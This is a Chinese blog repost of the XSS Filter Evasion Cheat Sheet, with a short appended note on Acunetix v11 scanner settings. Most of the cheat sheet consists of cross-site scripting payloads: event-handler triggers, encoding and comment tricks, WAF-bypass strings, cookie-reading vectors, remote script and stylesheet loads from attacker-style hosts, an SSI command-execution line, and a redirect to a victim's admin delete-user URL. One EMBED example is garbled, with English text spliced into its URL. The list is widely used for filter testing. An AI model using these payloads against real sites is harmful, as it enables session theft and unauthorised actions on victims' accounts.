  2. onAbort() (当用户中止加载图像时)
  3. onActivate() (当对象设置为活动元素时)
  4. onAfterPrint() (在用户打印或预览打印作业后激活)
  5. onAfterUpdate() (在更新源对象中的数据后激活数据对象)
  6. onBeforeActivate() (在将对象设置为活动元素之前触发)
  7. onBeforeCopy() (攻击者在将选择复制到剪贴板之前执行攻击字符串 – 攻击者可以使用 execCommand(“Copy”) 功能执行此操作)
  8. onBeforeCut() (攻击者在选择被切断之前执行攻击字符串)
  9. onBeforeDeactivate() (在从当前对象更改activeElement之后触发)
  10. onBeforeEditFocus() (在可编辑元素中包含的对象进入UI激活状态之前触发,或者当可控制可选容器对象被选择时触发)
  11. onBeforePaste() (用户需要被欺骗粘贴或被强制使用 execCommand(“Paste”) 功能)
  12. onBeforePrint() (用户需要被骗到打印或攻击者可以使用 print() or execCommand(“Print”) 功能).
  13. onBeforeUnload() (用户需要被诱骗关闭浏览器 – 攻击者无法卸载窗口,除非从父级生成.)
  14. onBeforeUpdate() (在更新源对象中的数据之前激活数据对象)
  15. onBegin() (当元素的时间轴开始时,onbegin事件会立即触发)
  16. onBlur() (在另一个弹出窗口加载窗口失去焦点的情况下)
  17. onBounce() (当选框对象的行为属性设置为 “alternate”并且选框的内容到达窗口的一边时触发.)
  18. onCellChange() (数据提供者中数据更改时触发)
  19. onChange() 选择, text,或TEXTAREA字段失去焦点,或其值已被修改)
  20. onClick() (需要人点击表单)
  21. onContextMenu() (用户需要右击攻击区域)
  22. onControlSelect() (当用户即将对对象进行控件选择时触发)
  23. onCopy() (用户需要复制某些东西,或者可以使用 execCommand(“Copy”) 命令利用它)
  24. onCut() (用户需要复制某些东西,或者使用execCommand(“Cut”) 命令可以利用它.)
  25. onDataAvailable() (用户需要更改元素中的数据,或者攻击者可以执行相同的功能)
  26. onDataSetChanged() (由数据源对象公开的数据集更改时触发)
  27. onDataSetComplete() (触发以指示所有数据可从数据源对象获得)
  28. onDblClick() (用户双击表单元素或链接)
  29. onDeactivate() (当activeElement从当前对象更改为父文档中的另一个对象时触发)
  30. onDrag() (要求用户拖动对象)
  31. onDragEnd() (要求用户拖动对象)
  32. onDragLeave() (要求用户将对象拖放到有效的位置)
  33. onDragEnter() (要求用户将对象拖放到有效位置)
  34. onDragOver() (要求用户将对象拖放到有效位置)
  35. onDragDrop() (用户将一个对象(例如文件)放到浏览器窗口上)
  36. onDragStart() (当用户开始拖动操作时发生)
  37. onDrop() (用户将一个对象(例如文件)放到浏览器窗口上)
  38. onEnd() (当时间轴结束时,onEnd事件触发.)
  39. onError() (加载文档或图像会导致错误)
  40. onErrorUpdate() (当更新数据源对象中的关联数据时发生错误时,在数据绑定对象上触发)
  41. onFilterChange() (视觉过滤器完成状态更改时触发)
  42. onFinish() (当选框完成循环时,攻击者可以创建漏洞)
  43. onFocus() (攻击者在窗口获得焦点时执行攻击字符串)
  44. onFocusIn() (当窗口获得焦点时攻击者执行攻击字符串)
  45. onFocusOut() (当窗口失去焦点时攻击者执行攻击字符串)
  46. onHashChange() (当文档的当前地址的片段标识符部分更改时触发)
  47. onHelp() (攻击者在窗口对焦时用户点击F1时执行攻击字符串)
  48. onInput() (元素的文本内容通过用户界面进行更改)
  49. onKeyDown() (用户按下一个键)
  50. onKeyPress() (用户按下或按住一个键)
  51. onKeyUp() (用户释放一个键)
  52. onLayoutComplete() (用户必须打印或打印预览)
  53. onLoad() (攻击者在窗口加载后执行攻击字符串)
  54. onLoseCapture() (可以通过 releaseCapture() 方法利用)
  55. onMediaComplete() (当使用流媒体文件时,该事件可能在文件开始播放之前触发)
  56. onMediaError() (用户在浏览器中打开包含媒体文件的页面,当有问题时触发事件)
  57. onMessage() (当文档收到消息时触发)
  58. onMouseDown() (攻击者需要让用户点击图像)
  59. onMouseEnter() (光标移动一个对象或区域)
  60. onMouseLeave() (攻击者需要让用户将鼠标悬停在图像或表上,然后再次关闭)
  61. onMouseMove() (攻击者需要让用户将鼠标放在图像或表格上)
  62. onMouseOut() (攻击者需要让用户将鼠标移到图像或表上,然后再次关闭)
  63. onMouseOver() (光标移动一个对象或区域)
  64. onMouseUp() (攻击者需要让用户点击图像)
  65. onMouseWheel() (攻击者需要让用户使用他们的鼠标滚轮)
  66. onMove() (用户或攻击者会移动页面)
  67. onMoveEnd() (用户或攻击者会移动页面)
  68. onMoveStart() (用户或攻击者会移动页面)
  69. onOffline() (如果浏览器工作在在线模式并且它开始脱机工作,则会发生)
  70. onOnline() (如果浏览器处于离线模式并且开始在线工作,则会发生)
  71. onOutOfSync() (中断元素根据时间轴定义的播放媒体的能力)
  72. onPaste() (用户需要粘贴或者攻击者可以使用 execCommand(“Paste”) 功能)
  73. onPause() (当时间线暂停时,包括body元素在内的每个元素处于活动状态时,onpause事件触发)
  74. onPopState() (用户导航会话历史时触发)
  75. onProgress() (攻击者会将此作为Flash影片加载)
  76. onPropertyChange() (用户或攻击者需要更改元素属性)
  77. onReadyStateChange() (用户或攻击者需要更改元素属性)
  78. onRedo() (用户在撤销交易历史中前进)
  79. onRepeat() (事件每次重复一次时间轴,不包括第一个完整周期)
  80. onReset() (用户或攻击者重置表单)
  81. onResize() (用户将调整窗口大小;攻击者可以自动初始化,例如: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
  82. onResizeEnd() (用户将调整窗口大小;攻击者可以自动初始化,例如: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
  83. onResizeStart() (用户可以调整窗口大小;攻击者可以自动初始化,例如: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
  84. onResume() (时间轴恢复时,每个元素上的onresume事件都会触发,包括body元素)
  85. onReverse() (如果元素的repeatCount大于1,则此事件会在时间线开始向后播放时触发)
  86. onRowsEnter() (用户或攻击者需要更改数据源中的一行)
  87. onRowExit() (用户或攻击者需要更改数据源中的一行)
  88. onRowDelete() (用户或攻击者需要删除数据源中的一行)
  89. onRowInserted() (用户或攻击者需要在数据源中插入一行)
  90. onScroll() (用户需要滚动,或者攻击者可以使用scrollBy() 函数)
  91. onSeek() (当时间线设置为在向前方向以外的任何方向播放时,onreverse事件触发)
  92. onSelect() (用户需要选择一些文本 – 攻击者可以自动初始化,如: window.document.execCommand(“SelectAll”);)
  93. onSelectionChange() (用户需要选择一些文本 – 攻击者可以自动初始化,如: window.document.execCommand(“SelectAll”);)
  94. onSelectStart() (用户需要选择一些文本 – 攻击者可以自动初始化,如: window.document.execCommand(“SelectAll”);)
  95. onStart() (在每个选框循环的开始处触发)
  96. onStop() (用户需要按停止按钮或离开网页)
  97. onStorage() (存储区域更改)
  98. onSyncRestored() (用户中断元素根据时间轴定义的播放媒体的能力)
  99. onSubmit() (要求攻击者或用户提交表单)
  100. onTimeError() (用户或攻击者将dur属性设置为无效值)
  101. onTrackChange() (用户或攻击者在播放列表中更改轨道)
  102. onUndo() (用户在撤消事务历史记录中向后退)
  103. onUnload() (当用户点击任何链接或按下后退按钮或攻击者强制点击)
  104. onURLFlip() (当由HTML + TIME(定时互动多媒体扩展)媒体标签播放的高级流格式(ASF)文件处理嵌入在ASF文件中的脚本命令时,该事件触发)
  105. seekSegmentTime() (这是一种在元素段时间线上定位指定点并从该点开始播放的方法,该段由包括使用AUTOREVERSE属性的反向播放的时间线的一个重复组成.)

利用< BGSOUND >标签进行XSS

<BGSOUND SRC=”javascript:alert(‘XSS’);”>

利用& JavaScript includes方法进行XSS

<BR SIZE=”&{alert(‘XSS’)}”>

利用样式表<ink>标签进行XSS

<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>

利用远程样式表进行XSS

(使用像远程样式表这样的东西,你可以利用样式参数作为XSS,可以用嵌入表达式方式来完成XSS攻击).但是它仅仅适用在IE浏览器或者Netscape 8.1+下运行.需要注意页面上没有显示包含Javascript代码.使用这样的远程样式表,至少需要使用body标签,因此除非显示paylod本身的其他内容.如果他是一个空白页面,你需要添加至少一个字母到页面显示,确保payload可以正常工作..

<LINK REL=”stylesheet” HREF=”http://ha.ckers.org/xss.css”>

利用远程样式表进行XSS part 2

这跟上述原理相同,只不过这里使用的<STYLE>标签来代替<LINK>,稍微变动下被用来攻击GOOGLE Desktop.注意:如果此payload遇到闭合后会出现在htrml上,则可以考虑删除</style>.如果你在XSS脚本攻击中无法使用等号或斜杠,那么可以试试这个:

<STYLE>@import’http://xss.rocks/xss.css’;</STYLE>

利用远程样式表进行XSS part 3

适用于Opera8.0(不支持9.X),根据RFC2616设置链接头,.它不符合HTTP1.1的规范,但是有一些浏览器仍然允许它(如firefox和Opera).这里技巧就是,我设置一个http头(这里与HTTP头没什么区别,例如: <http://xss.rocks/xss.css>; REL=stylesheet).这样带远程XSS payload将会运行,但是它并不支持FireFox.

<META HTTP-EQUIV=”Link” Content=”<http://xss.rocks/xss.css>; REL=stylesheet”>

利用远程样式表进行XSS part 4

仅适用于Gecko渲染引擎,并将XUL文件绑定到父页面.个人认为这里是讽刺Netscape,Gecko是更安全的,因此绝大多数网站容易受到这种影响:

<STYLE>BODY{-moz-binding:url(“http://xss.rocks/xssmoz.xml#xss”)}</STYLE>

利用<style>标签来分解XSS payload

此payload有时会将IE浏览器中造成无限循环.

<STYLE>@im\port’\ja\vasc\ript:alert(“XSS”)’;</STYLE>

利用<img>style属性配合注释符来分解XSS payload

由Roman Ivanov创建.

<IMG STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”>

利用<style>标签进行分解XSS payload 增强版

这与上述XSS payload混合,但他确实展现了<style>标签被分隔解析是多困难.同样它也会在IE下造成无限弹窗.

exp/*<A STYLE=’no\xss:noxss(“*//*”);

xss:ex/*XSS*//*/*/pression(alert(“XSS”))’>

利用<STYLE>标签(仅限于老版本Netscape)

<STYLE TYPE=”text/javascript”>alert(‘XSS’);</STYLE>

利用<style>标签的background-image属性进行XSS

<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>

利用<style>标签的background属性进行XSS

<STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>

利用具有style属性的匿名的HTML标签进行XSS

IE渲染引擎模式中IE6.0和Netscape8.1+并不关系你创建的html标签是否存在,只要它是以<>全开括号和字母开头就行;

<XSS STYLE=”xss:expression(alert(‘XSS’))”>

利用本地HTC文件进行XSS

这跟上述两个XSSpayload有点不同,因为它使用的.htc文件必须与XSS payload在同一域内.示例文件通过写入Javascript并利用style属性来运行;

<XSS STYLE=”behavior: url(xss.htc);”>

US-ASCII编码

US-ASCII编码(由于Kurt Huwig发现).这里使用7位代替8位,该XSS payload可以绕过很多基于内容检测的过滤器,但仅限于主机上使用US-ASCII编码传输或者你设置为此编码时才起作用.这对于WEB应用防火墙XSS过滤比对服务器端过滤绕过更有用.已知Apache Tomcat目前唯一以US-ASCII编码传输的服务器.

¼script¾alert(¢XSS¢)¼/script¾

利用< META >标签进行XSS

利用<META>奇怪之处在于它不会在http头中发送引用referrer,因此它可以用用于某些类型攻击,你需要避免引入URL:

<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”>

利用<META>标签的content属性进行XSS

这种方案其实很不错,因为他没有任何明显的script或者Javascript指令,因为它使用base64编码.具体请参考RFC 2397了解更多详情,或者访问此处XSS编码器对你的XSSpaylod进行base64编码.

<META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>

利用<META>标签的带URL参数进行XSS绕过

如果目标网站尝试检查URL是否包含http://,那么你可以使用以下payload来绕过它.( 由于Moritz Naumann提出);

<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>

利用<IFRAME>标签进行XSS

如果目标网站允许<IFRAME>,那么会产生很多XSS问题.

<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>

利用事件触发<IFRAME>标签的XSS

Iframes还有大多数其他元素可以使用像一下基于事件来进行混淆(由于David Cross提交.)

<IFRAME SRC=# onmouseover=”alert(document.cookie)”></IFRAME>

利用<FRAME>进行XSS

<FRAME>与<IFRAME>存在相同的问题.

<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>

利用<TABLE>标签进行XSS

<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>

利用<TD>标签进行XSS

如图上面所述,<TD>也容易受到包含Javascript的XSS payload攻击.

<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>

利用<DIV>标签

在DIV中使用background-image属性完成XSS

<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

使用background-image属性配合unicoded编码完成XSS

这只是稍微修改去混淆下URL参数.它最早被Renaud Lifchitz发现用于攻击hotmaill;

<DIV STYLE=”background-image:\0075\0072\006C\0028’\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029’\0029″>

使用background-image属性加上额外字符完成XSS

Rnaske建立了一个快速的XSS Fuzzer来检测半开扩号后允许的字符,但在安全的站点模式下IE和Netscape8.1中Javascript命令之前.这些都是十进制的,但当然可以利用十六进制进行填充.(可以使用以下任意字符: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279)

<DIV STYLE=”background-image: url(&#1;javascript:alert(‘XSS’))”>

利用DIV表达式完成XSS

这个payload稍微修改下在冒号和” expression”中间加入一个换行符,可以非常有效绕过真实的XSS防护.

<DIV STYLE=”width: expression(alert(‘XSS’));”>

利用IE注释块进行XSS绕过

尽在IE5.0及以上版本和使用IE渲染引擎模式的Netscape下有效.一些网站认为在注释内的内容是安全的,因此不需要移除.或者系统能够在页面某些部分添加注释标签,从而让它们失去有害性.如我们所知,这些操作(把内容注释掉的操作)可能是于事无补的:

<!–[if gte IE 4]>

<SCRIPT>alert(‘XSS’);</SCRIPT>

<![endif]–>

利用<BASE>标签进行XSS

这在IE和Netscape8.1的安全模式下能起作用.你需要使用//注释掉下一个字符,避免JavaScript错误,从而让我们的XSS攻击向量正常执行.这也依赖于一个条件:网站图像使用相对地址如”images/image.jpg”,而非绝对地址.如果地址中包含了斜杠(“/images/image.jpg”),你可以在XSS payload移除一个:

<BASE HREF=”javascript:alert(‘XSS’);//”>

利用<OBJECT>标签进行XSS

如果页面允许<OBJECT>标签,你甚至可以在页面挂马.下面链接指向的文件是一个可以包含你的XSS payload的HTML文件;

<OBJECT TYPE=”text/x-scriptlet” DATA=”http://xss.rocks/scriptlet.html”></OBJECT>

使用<EMBED>标签嵌入一个包含XSS的Flash动画

如果你添加allowScriptAccess=“never”和allownetworking=”internal”属性,可以减轻这种风险(感谢Jonathan Vanasco提供信息);

EMBED SRC=”http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess=”never” and allownetworking=”internal” it can mitigate this risk (thank you to Jonathan Vanasco for the info).:

org/xss.swf” AllowScriptAccess=”always”></EMBED>

你可以嵌入包含XSS payload的SVG

这个例子只在Firefox下有效,但它比上面的攻击向量要好一些,因为这不需要用户安装或开启Flash(感谢nEUrOO提供):

<EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>

使用ActionScript来混淆你的XSS payload

a=”get”;

b=”URL(\””;

c=”javascript:”;

d=”alert(‘XSS’);\”)”;

eval(a+b+c+d);

利用XML数据与CDATA区段混淆进行XSS

这个XSS payload仅限于IE和Netscape8.1中的IE渲染引擎中工作(由于Sec Consult在对yahoo进行审计时候发现这个payload)

<XML ID=”xss”><I><B><IMG SRC=”javas<!– –>cript:alert(‘XSS’)”></B></I></XML>

<SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>

利用XML的embedded方法在本地XML中嵌入Javascript

这与上述相同,在本地托管(必须在同一台服务器上)包含你的XSS payload的XML文件.具体看示例;

<XML SRC=”xsstest.xml” ID=I></XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

利用XML中加入HTML+Time元素完成XSS

这就是Grey Magic攻击hotmail和yahoo!的方法,这仅限于IE和Netscape8.1中使用,并记住,需要在HTML和<BODY>标签之间使用;

<HTML><BODY>

<?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”>

<?import namespace=”t” implementation=”#default#time2″>

<t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>alert(“XSS”)</SCRIPT>”>

</BODY></HTML>

通过简单修改字符去绕过过滤器对”.js”的过滤

可以将XSS payload的Javascript文件重命名为图片文件命名规则.

<SCRIPT SRC=”http://xss.rocks/xss.jpg”></SCRIPT>

SSI(服务端包含)进行XSS

这需要在服务器上安装SSI,这样才能使用这个XSS payload.可能不需要提及这一种攻击方法,如果攻击者可以在服务器上执行命令,那么这个安全问题就更严重了.

<!–#exec cmd=”/bin/echo ‘<SCR'”–><!–#exec cmd=”/bin/echo ‘IPT SRC=http://xss.rocks/xss.js></SCRIPT>'”–>

利用PHP完成XSS

需要在服务器上安装php才能使用XSS payload.再次提醒下,如果你可以像这样远程运行任意脚本,那么可能有更多可怕的安全问题;

<? echo(‘<SCR)’;

echo(‘IPT>alert(“XSS”)</SCRIPT>’); ?>

利用IMG标签嵌入命令执行XSS

它是需要用户认证后才可以执行命令的当前域页面。它将可以用于创建或者删除用户(如果访问者是管理员),或是在其他地方发送凭证等等,虽然较少被使用,但非常有效的。

译者注:可以理解为类似CSRF那种操作.

<IMG SRC=”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode”>

利用IMG标签嵌入命令执行XSS part II

这是一种更加可怕地攻击,因为没有看起来可以区别的标示符,而且它也不用放在被攻击者网站上.攻击向量使用302或304来跳转图片到一个命令地址.一个正常的<IMG SRC=”httx://badguy.com/a.jpg”>能够成为一个攻击工具,来执行相应的攻击命令.下面一个在Apache上的用来进行攻击的.htaccess文件的内容(感谢Timo提供)::

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

Cookie篡改

我承认这是一种很隐蔽的攻击方式,但我曾经见过一些示例:页面允许<META>标签,你可以用它来覆盖cookie.还有一些其他的示例:页面不是从数据库中取用户名,而是从cookie中读取.这两个场景相结合的情况下,你可以修改受害者的cookie,让你的XSS payload可以在页面上执行(同样你可以用它来改变用户状态,让它们以你的身份登录等):

<META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>”>

利用UTF-7编码进行XSS

如果页面存在XSS并且没有提供页面编码或者浏览器设置为UTF-7编码,页面就能遭到这种攻击(感谢Roman Ivanov).在现代浏览器中,除非修改编码类型,否则这种攻击是不会产生的(Watchfire在google的404脚本中发现了这个漏洞)

<HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7″> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-

使用HTML引用封装进行XSS

这个在IE测试过,视情况而定.对于允许”<script>”标签,但不允许通过”<SCRIPT SRC…”(正则表达式为:”/<script[^>]+src/I”),这种情况就可以考虑下此payload;

<SCRIPT a=”>” SRC=”httx://xss.rocks/xss.js”></SCRIPT>

对于允许”<script>”标签,但不允许”<script src …>”站点上执行XSS payload正则表达式为

” /<script((\s+\w+(\s*=\s*(?:”(.)*?”|'(.)*?’|[^'”>\s]+))?)+\s*|\s*)src/i”,(这个很重要,因为这种正则匹配很常见.)

<SCRIPT =”>” SRC=”httx://xss.rocks/xss.js”></SCRIPT>

另外一个绕过类似这种正则过滤绕过,XSS payload.

(” /<script((\s+\w+(\s*=\s*(?:”(.)*?”|'(.)*?’|[^'”>\s]+))?)+\s*|\s*)src/i”)

<SCRIPT a=”>” ” SRC=”httx://xss.rocks/xss.js”></SCRIPT>

最后一种绕过这种正则过滤,XSS payload,使用重音符(它无法在firefox下使用).正则表达式为:

“/<script((\s+\w+(\s*=\s*(?:”(.)*?”|'(.)*?’|[^'”>\s]+))?)+\s*|\s*)src/i”;

<SCRIPT a=> SRC=”httx://xss.rocks/xss.js”></SCRIPT>

这个XSS paylodad,会引起正则表达式不会匹配引号,同时发现会引起不正确的终止字符串.

<SCRIPT a=”>’>” SRC=”httx://xss.rocks/xss.js”></SCRIPT>

一个令人担忧的XSS payload

这种XSS payload让我很担忧,因为它几乎无法防御,除非禁用所有动态内容.

<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”httx://xss.rocks/xss.js”></SCRIPT>

URL字符串绕过

假定页面不允许出现http://www.google.com/;

利用IP代替域名

<A HREF=”http://66.102.7.147/”>XSS</A>

利用URL编码

<A HREF=”http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D”>XSS</A>

利用双字节编码

(注意:还有其他双字节编码方式,具体可以通过后面的IP混淆计算器来获取更多信息)

<A HREF=”http://1113982867/”>XSS</A>

利用十六进制编码

你可以在第2个数字看出来,每个数字允许的总大小在240之内.16进制的值是介于0~F之间的.从第3个数字看,前导0的也是不需要的:

<A HREF=”http://0x42.0x0000066.0x7.0x93/”>XSS</A>

利用八进制编码

你可以填充0,但是要保证每个“数字”都不小于4个字符:

<A HREF=”http://0102.0146.0007.00000223/”>XSS</A>

利用混合编码

我们混合并匹配基本编码,添加一些制表符和换行符.这些符号需要包含在引号内才起作用.

<A HREF=”h

tt p://6 6.000146.0×7.147/”>XSS</A>

利用协议解析绕过

(//转换为http://能节省一些字符).当空间成为问题时,这是非常方便的方法.也能绕过类似于”(ht|f)tp(s)?://“的正则(感谢Ozh的提供).你可以将”//“改为”\”.你需要保证斜杠在准确的位置,否则有可能被当成一个相对路径.

<A HREF=”//www.google.com/”>XSS</A>

利用Google”手气不错” part 1

Firefox使用Google的手气不错功能来根据用户键入的关键字跳转到对应的网站.如果你的攻击页面在一些随机关键词的顶部,你可以使用这个特性来攻击Firefox用户.这利用了Firefox的“keyword:”协议.你可以通过使用若干关键词来达到目的:”keyword:XSS+RSnake”,这在Firefox2.0版本不再有效.

<A HREF=”//google”>XSS</A>

利用Google”手气不错” part 2

这里使用了一个只有Firefox支持的小窍门.因为它是基于手气不错功能开发的.这个不支持opera,因为opera认为这是一个利用HTTP基本认证的网络钓鱼攻击.事实上它仅仅是一个畸形的URL.如果你单击这个链接的话,它就会产生作用.不过这个特性在Firefox2.0之后的版本也不支持了:

<A HREF=”http://ha.ckers.org@google”>XSS</A>

利用Google”手气不错” part 3

这是一个畸形的Url,只能在Firefox和Opera中起作用.因为它们是基于手气不错功能实现的, 像上面的例子一样,它们需要你的网站在谷歌搜索中排名第一(例如google):

<A HREF=”http://google:ha.ckers.org”>XSS</A>

利用删除cnames

结合上面的URL,移除www能节省4个字节:

<A HREF=”http://google.com/”>XSS</A>

利用额外点绕过

<A HREF=”http://www.google.com./”>XSS</A>

利用Javascript链接地址

<A HREF=”javascript:document.location=’http://www.google.com/'”>XSS</A>

利用内容替换的payload

假定”http://www.google.com/“被过滤器以编程方式被替换为空.我会使用类似的攻击向量借用过滤器的转换来绕过XSS过滤器从而创建攻击向量.下面是一个帮助创建攻击向量的例子(IE: “java&#x09;script:”被转换为”java script:”,这在IE、安全模式下的Netscape 8.1+和Opera是有效的);

<A HREF=”http://www.gohttp://www.google.com/ogle.com/”>XSS</A>

 

字符转义表

下面是<字符在HTML和Javascript中所有组合.大多数不会被浏览器直接执行.但是在很多能够在上述某些特定情况下使用.

<

%3C

&lt

&lt;

&LT

&LT;

&#60

&#060

&#0060

&#00060

&#000060

&#0000060

&#60;

&#060;

&#0060;

&#00060;

&#000060;

&#0000060;

&#x3c

&#x03c

&#x003c

&#x0003c

&#x00003c

&#x000003c

&#x3c;

&#x03c;

&#x003c;

&#x0003c;

&#x00003c;

&#x000003c;

&#X3c

&#X03c

&#X003c

&#X0003c

&#X00003c

&#X000003c

&#X3c;

&#X03c;

&#X003c;

&#X0003c;

&#X00003c;

&#X000003c;

&#x3C

&#x03C

&#x003C

&#x0003C

&#x00003C

&#x000003C

&#x3C;

&#x03C;

&#x003C;

&#x0003C;

&#x00003C;

&#x000003C;

&#X3C

&#X03C

&#X003C

&#X0003C

&#X00003C

&#X000003C

&#X3C;

&#X03C;

&#X003C;

&#X0003C;

&#X00003C;

&#X000003C;

\x3c

\x3C

\u003c

\u003C

 

针对跨站脚本攻击-绕过WAF的方法

一般问题

  • 存储型XSS

如果攻击者绕过过滤器发起XSS攻击,WAF将无法防御攻击

  • 反射型XSS
Example: <script> … setTimeout(\”writetitle()\”,$_GET[xss]) … </script>

Exploitation: /?xss=500); alert(document.cookie);//

基于DOM型XSS

Example: <script> … eval($_GET[xss]); … </script>

Exploitation: /?xss=document.cookie

XSS请求重定向

容易受攻击代码:

header(‘Refresh: 0; URL=’.$_GET[‘param’]);
  • 此请求WAF将会被拦截
/?param=javascript:alert(document.cookie)
  • 利用编码将绕过WAF,并会在某些浏览器中执行XSS paylod.
/?param=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

针对XSS bypass WAF的字符串

<Img src = x onerror = “javascript: window.onerror = alert; throw XSS”>

<Video> <source onerror = “javascript: alert (XSS)”>

<Input value = “XSS” type = text>

<applet code=”javascript:confirm(document.cookie);”>

<isindex x=”javascript:” onmouseover=”alert(XSS)”>

“></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

“><img src=”x:x” onerror=”alert(XSS)”>

“><iframe src=”javascript:alert(XSS)”>

<object data=”javascript:alert(XSS)”>

<isindex type=image src=1 onerror=alert(XSS)>

<img src=x:alert(alt) onerror=eval(src) alt=0>

<img src=”x:gif” onerror=”window[‘al\u0065rt’](0)”></img>

<iframe/src=”data:text/html,<svg onload=alert(1)>”>

<meta content=”&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)” http-equiv=”refresh”/>

<svg><script xlink:href=data&colon;,window.open(‘https://www.google.com/’)></script

<meta http-equiv=”refresh” content=”0;url=javascript:confirm(1)”>

<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>

<form><a href=”javascript:\u0061lert(1)”>X

</script><img/*%00/src=”worksinchrome&colon;prompt(1)”/%00*/onerror=’eval(src)’>

<style>//*{x:expression(alert(/xss/))}//<style></style>

On Mouse Over​

<img src=”/” =_=” title=”onerror=’prompt(1)'”>

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

<script x> alert(1) </script 1=2

<form><button formaction=javascript&colon;alert(1)>CLICKME

<input/onmouseover=”javaSCRIPT&colon;confirm&lpar;1&rpar;”

<iframe src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”></iframe>

利用混淆绕过过滤器

(alert)(1)

a=alert,a(1)

[1].find(alert)

top[“al”+”ert”](1)

top[/al/.source+/ert/.source](1)

al\u0065rt(1)

top[‘al\145rt’](1)

top[‘al\x65rt’](1)

top[8680439..toString(30)](1)

作者和主编

Robert “RSnake” Hansen

贡献者

Adam Lange

Mishra Dhiraj其他备忘录

就不一样介绍了,详情请访问

https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series

  1. XSS过滤绕过备忘单-http://cheatsheets.hackdig.com/?4.htm
  2. 重音符位于美式键盘TAB键上面那个键位,英文中俗称” Grave accent”键.
  3. 不止有TAB,而且空格键也可以,并且可以利用两个空格来代替一个空格进行绕过测试.

转载请注明: 转载自Legend‘s BLog

本文链接地址: XSS Filter Evasion Cheat Sheet(XSS BYPASS备忘录)

关于Acunetix v11 WebUI下不得不说的事情!

legend阅读(19025)评论(0)

上了官网把介绍Quick-start影片看了一下,脑中浮现不少疑问.

有些功能就像跟你玩捉迷藏一样的不知藏到哪里去了,以下分别针对Web UI及CLI (wvsc.exe)的功能做了一些整理:

1. AWVSV11装完以后在哪里?

WEB:

https://loaclhost:3443/

WVSC:

C:\Program Files (x86)\Acunetix 11\core\wvsc.exe

2. AWVSV11扫完以后为什么只能汇出PDF或HTML啊???其实…

在新增Target时,开启Debug scans功能,让世界更美好(误)

https://4.bp.blogspot.com/-jFlj48MnXE4/WO4sPTU6unI/AAAAAAAADf4/jiBVNsUfTGgayb9En1o_RUWmXwK8eR0HQCLcB/s1600/report.png

Targets -> Advanced -> Debug scans for this target (打勾)

https://4.bp.blogspot.com/-sf4DX1hF5wM/WO4nMQ7ZNmI/AAAAAAAADfg/42WN9W6lTcEUpGsCcIQDrLNxB_fTIMG1ACLcB/s1600/debugscan.png

之后扫完便会产出三个文件(logfile.csv, results.wvs, settings.xml),放在 C:\ProgramData\Acunetix 11\shared\scans\ 底下,并以zip储存。

https://3.bp.blogspot.com/-XCAOQ87tZzA/WO4nwOBnmvI/AAAAAAAADfo/LRKlYOTRGKcbrg_h8KVfRu2jeoRHBqJ8QCLcB/s1600/sharedscans.png

(WVSC)相较于使用Web UI可以汇出多种格式的结果档,CLI却只提供/save results.wvs的功能。
3. 那若是爬完或扫描完想【导出XML】呢?

Scans -> (点选任一个Scan项目) -> Export to… -> XML

